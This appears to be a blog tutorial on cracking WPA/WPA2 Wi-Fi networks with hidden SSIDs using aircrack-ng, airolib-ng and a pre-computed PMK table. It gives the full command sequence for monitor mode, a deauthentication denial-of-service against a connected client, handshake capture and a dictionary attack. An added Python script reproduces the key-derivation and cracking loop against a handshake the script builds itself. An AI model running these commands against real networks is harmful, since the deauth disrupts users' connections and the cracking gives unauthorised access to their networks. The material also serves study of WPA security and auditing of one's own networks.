Cracking WiFi - WPA/WPA2 With Hidden SSID (Aircrack-ng + Airolib-ng)

How to crack a wireless network using WPA/WPA2 (PSK/AES) encryption that has a connected client (WPA and WPA2-PSK are attacked the same way, so one method covers both). A pre-computed hash table, "pre-salted" with the network's ESSID, is then used to recover the pass-phrase from the captured handshake; because the ESSID is the salt, it has to be known even when the network hides it.

Links

Download video: http://download.g0tmi1k.com/videos_archive/WPA2-airolib-ng_[Hidden_SSID].mp4

Method

  • Run a quick DoS (Denial of Service) attack against a connected client to force it to disconnect and reconnect
  • Capture the 4-way handshake (and the ESSID, which a hidden network only reveals when the client re-associates)
  • Pre-compute the PMK table for that ESSID with airolib-ng, then run a dictionary attack against the handshake

Tools

  • Aircrack-ng suite
  • WiFi card that supports monitor mode
  • Big dictionary
  • Processing power

Software

Name: Aircrack-ng

Version: 1.0-rc3

Home Page: http://www.aircrack-ng.org/doku.php

Download Link: hxxp://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz

Commands

# Put the card in monitor mode (aircrack-ng 1.0-rc3 creates mon0)
airmon-ng start wlan0

# Find the target; a hidden network shows its ESSID as <length: N> until a client joins
airodump-ng mon0
# Lock on to the BSSID and channel, and write the capture (including the handshake) to output-*.cap
airodump-ng --bssid 00:1B:9E:B2:60:00 -c 1 -w output mon0

# Kick the connected client so it reconnects: this reveals the ESSID and produces the 4-way handshake
aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0

# Build the PMK database "crackwpa": import the wordlist, then the ESSID (one per line in ~/essid)
airolib-ng crackwpa --import passwd /root/tools/dictionaries/g0tmi1k.lst
kate ~/essid
airolib-ng crackwpa --import essid ~/essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch    # pre-compute the PMKs: the slow PBKDF2 step, done once per ESSID
airolib-ng crackwpa --verify all

# Crack using the pre-computed table instead of re-hashing the wordlist
aircrack-ng -r crackwpa output*.cap
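The key derivation behind the commands above, in Python, as an added example that is not part of the original post or of the aircrack-ng suite. It shows what `airolib-ng --batch` pre-computes (PBKDF2-HMAC-SHA1 of pass-phrase and ESSID, 4096 rounds), what `aircrack-ng -r` still has to do per handshake (PRF-512 to the PTK, then the EAPOL-Key MIC check), and why a table built for one ESSID is useless for another. The handshake is constructed inside the script: fixed nonces, the two MACs from the commands, and an assumed ESSID "hidden-net" and pass-phrase "correct horse battery"; no real traffic is involved. The EAPOL frame carries no RSN IE, which a real message 2 would include; it does not affect how the MIC is computed.

```python
import hashlib
import hmac


# ---- the derivation that airolib-ng pre-computes --------------------------------
def pmk_from_passphrase(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds, 256 bits).
    The ESSID is the salt, so a table of PMKs is only valid for one network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def build_pmk_table(essid: str, wordlist) -> dict:
    """What `airolib-ng --batch` produces: one PMK per (ESSID, pass-phrase) pair."""
    return {w: pmk_from_passphrase(w, essid) for w in wordlist}


# ---- the per-handshake part that aircrack-ng does at verification time ---------
def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces).
    Only the first 16 bytes (the KCK) are needed to check the handshake MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2/AES (key descriptor version 2): HMAC-SHA1 over the EAPOL-Key frame with the
    MIC field zeroed, truncated to 16 bytes. WPA/TKIP (version 1) would use HMAC-MD5."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 of 4 with its MIC field (bytes 81..96) zeroed;
    this is the frame aircrack-ng pulls out of output-01.cap."""
    key_info = (0x010A).to_bytes(2, "big")          # version 2 (HMAC-SHA1/AES), pairwise, MIC bit
    body = (b"\x02"                                  # descriptor type: RSN (WPA2)
            + key_info
            + (0).to_bytes(2, "big")                 # key length (0 in message 2)
            + (1).to_bytes(8, "big")                 # replay counter
            + snonce                                 # 32-byte SNonce
            + bytes(16) + bytes(8) + bytes(8)        # key IV, RSC, key ID (unused here)
            + bytes(16)                              # MIC field, zeroed for computation
            + (0).to_bytes(2, "big"))                # key data length (RSN IE omitted in this demo)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X: version 1, type EAPOL-Key


def crack(table: dict, ap_mac, sta_mac, anonce, snonce, eapol_zeroed: bytes, captured_mic: bytes):
    """The loop behind `aircrack-ng -r <db>`: no PBKDF2 per candidate, only PRF + HMAC."""
    for passphrase, pmk in table.items():
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), captured_mic):
            return passphrase
    return None


# ---- constructed handshake (assumed values, not captured traffic) ---------------
ESSID = "hidden-net"                                     # assumed network name
TRUE_PASSPHRASE = "correct horse battery"                # assumed, and present in the wordlist
AP_MAC = bytes.fromhex("001B9EB26000")                   # BSSID used in the commands above
STA_MAC = bytes.fromhex("00121794900D")                  # client used in the commands above
ANONCE = bytes(range(32))                                # fixed nonces instead of random ones
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "letmein", "g0tmi1k", TRUE_PASSPHRASE, "12345678"]


def constructed_handshake():
    """Return (EAPOL frame with MIC zeroed, the MIC the client would have sent)."""
    eapol = build_eapol_msg2(SNONCE)
    kck = ptk_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, ESSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return eapol, eapol_mic(kck, eapol)


def demo(essid_for_table: str = ESSID):
    """Build the table for the given ESSID and try it against the constructed handshake."""
    eapol, mic = constructed_handshake()
    return crack(build_pmk_table(essid_for_table, WORDLIST), AP_MAC, STA_MAC, ANONCE, SNONCE, eapol, mic)


if __name__ == "__main__":
    print("table for", ESSID, "->", demo())               # correct horse battery
    print("table for 'other-net' ->", demo("other-net"))   # None: wrong ESSID, useless table
```

The second call is the point of the hidden-SSID case: the same wordlist hashed under a different ESSID never matches, so the ESSID has to be recovered (from the client's re-association after the deauth) before `--batch` is worth running.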

Notes

  • This is cut from my final video called "g0tmi1k's home network".
  • There HAS to be a CONNECTED client: the deauth forces it to re-associate, which is what produces the handshake and, for a hidden network, reveals the ESSID that the PMK table is salted with.
  • The pass-phrase HAS to be in the dictionary, so if the target uses something like http://grc.com/pass, the chance of it being cracked is next to nothing.

Song: Sub Focus - Rock It

Video length: 03:53

Capture length: 04:03

Blog Post: https://blog.g0tmi1k.com/2009/07/cracking-wifi-wpawpa2-hidden-ssid/